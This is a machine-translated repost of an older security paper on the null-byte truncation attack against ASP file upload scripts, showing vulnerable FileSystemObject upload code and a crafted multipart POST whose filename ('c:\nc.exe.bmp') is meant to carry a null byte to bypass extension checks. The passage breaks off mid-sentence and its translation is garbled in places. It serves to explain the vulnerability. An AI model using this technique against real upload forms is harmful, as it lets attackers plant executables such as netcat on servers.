0 × 00 Truncation Attack applied to ASP File Upload Vulnerability

 

Kingbase

 

2011/8/1

 

A brief description of the Chinese

This article translated from: 0x00 vs ASP file uploads, the original author is: Brett Moore, Security-Assessment.com company, this article was written in 04 years, the original here: http: // response.

 

To put it bluntly, it is only useful when form post is used. It only applies to file name variables and methods such as asp CreateTextFile.

Introduction

Poison NULL byte technology has not been widely used in ASP, but as with other versions the NULL byte can cause problems when ASP passes data to objects.

 

There is a common problem in ASP-based upload: Empty bytes can be inserted into the file name so that the file name can be added with any extension. When writing files, all parts after the NULL bytes are ignored.

 

In this way, we can bypass some checks on the extension. even if one is appended by the application.

 

This is similar to Perl/PHP. The difference is how the empty byte is sent to the ASP program.

 

This occurs when the data is compared and verified without checking the NULL bytes, and is passed into FileSystemObject directly.

 

This article will discuss how the Poison Null Byte attack acts on ASP upload scripts.

 

Scope

This article is based on the following two points: POST (multipart/form-data) and Scripting. FileSystemObject objects during upload.

 

In this article, we focus on the CreateTextFile method, which is used to write files. Other object functions may also have such vulnerabilities.

 

% 00 or NULL bytes cannot be sent out in the URL or form post, because the server does not store the value in the file name variable although it considers this as a string result.

 

When the file name is sent in the form of multipart/form-data, the null byte is stored in the file name variable, which affects FileSystemObject calls.

 

File Upload

File Upload usually uses the input object type file and the encoding type multipart/form-data.

 

Content type application/x-www-form-urlencoded is not suitable for sending large amounts of binary data or non-ASCII characters, while multipart/form-data is more suitable.

 

A multipart/form-data message contains several parts. The parts are sent to the processing agent in the same order the corresponding controls appear in the document stream.

 

<Form method = post enctype = "multipart/form-data" action = upload. asp>

 

Your Picture: <BR> <input> <BR>

 

<Input value = "Upload">

 

</Form>

 

When form submit is used, the data is scheduled to be in the multipart/form-data format. This will encode the post data, which also contains NULL bytes.

 

File Storage

After the upload is successful, the file will be saved in one place. The following code is the common file upload processing code:

 

Sub Save () Sub Save (filename)

 

Dim objFSO, objFSOFile

 

Path = server. MapPath ("/uploads /")

 

Set objFSO = Server. CreateObject ("Scripting. FileSystemObject ")

 

Set objFSOFile = objFSO. CreateTextFile (path + "\" + filename)

 

ObjFSOFile. Write <file contents>

 

ObjFSOFile. Close

 

End Sub

 

When the file name parameter is passed to the CreateTextFile function, the file name may contain null bytes. This will cause the created file name to be truncated and ignored after the empty section.

 

Set objFSOFile = objFSO. CreateTextFile (path + "\" + filename)

 

NULL bytes

You can manually insert a NULL byte, or use a hexadecimal editor or web Agent. To insert a NULL byte, you must modify the multipart post data.

 

Multipart Form Post

 

POST or upload. asp HTTP/1.0

 

Content-Type: multipart/form-data; boundary = ---------

 

7d4cb161b009c

 

Host: localhost

 

Content-Length: 359

 

Pragma: no-cache

 

Cookie: ASPSESSIONIDSAADRCRS = LAKNNAKAGMIBJCOOLBIFEHIK

 

---------- 7d4cb161b009c

 

Content-Disposition: form-data; filename = "c: \ nc.exe. bmp"

 

Content-Type: text/plain

 

Proof Of Upload Test File

 

Brett.moore@security-assessment.com

 

---------- 7d4cb161b009c

 

Content-Disposition: form-data;

 

Upload

 

---------- 7d4cb161b009c

 

Note that the above file name parameter has been changed: